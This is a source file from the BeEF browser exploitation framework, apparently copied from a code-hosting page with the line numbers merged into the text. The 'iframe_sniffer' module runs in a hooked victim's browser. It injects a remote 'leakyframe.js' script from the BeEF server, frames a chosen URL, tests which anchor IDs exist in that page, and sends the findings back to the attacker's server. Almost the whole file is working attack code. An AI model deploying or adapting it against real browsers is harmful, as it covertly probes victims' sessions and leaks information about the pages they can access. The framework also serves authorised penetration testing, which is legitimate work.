Path: blob/master/modules/misc/iframe_sniffer/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//567beef.execute(function() {8var inputURL = '<%= @inputUrl %>';9var anchorsToCheck = '<%= @anchorsToCheck %>';10var arrayOfAnchorsToCheck = [];1112//the anchors should be seperated with ','13//remove tabs, newlines, carriage returns and spaces14anchorsToCheck = anchorsToCheck.replace(/[ \t\r\n]/g,'');15arrayOfAnchorsToCheck = anchorsToCheck.split(',');1617var resultList = [];18var resultString = '';1920//check if the leakyframe library is loaded21//if not add it to the DOM22if (typeof LeakyFrame !== 'function'){23var leakyscript = document.createElement('script');2425leakyscript.setAttribute('type', 'text/javascript');26leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js');27var theparent = document.getElementsByTagName('head')[0];28theparent.insertBefore(leakyscript, theparent.firstChild);29}3031var timeout = 100;3233//give the DOM some time to load the library34poll = function(){35setTimeout(function(){36timeout--;37if (typeof LeakyFrame === 'function') {38new LeakyFrame(inputURL,39function(frame){40//check each anchor41for (var anchor = 0; anchor < arrayOfAnchorsToCheck.length; anchor++){42if (frame.checkID(arrayOfAnchorsToCheck[anchor])){43resultList.push('Exists');44}45else{46resultList.push('Does not exist');47}48}49frame.remove();5051//create the resultstring52for (var i = 0; i < resultList.length; i++){53resultString = resultString + '#' + arrayOfAnchorsToCheck[i] + ' ' + resultList[i] + '; ';54}5556beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result: ' + resultString);57},false);58}59else if (timeout > 0){60poll();61}62else {63beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occured!');64}65}, 100);66};6768poll();69});70717273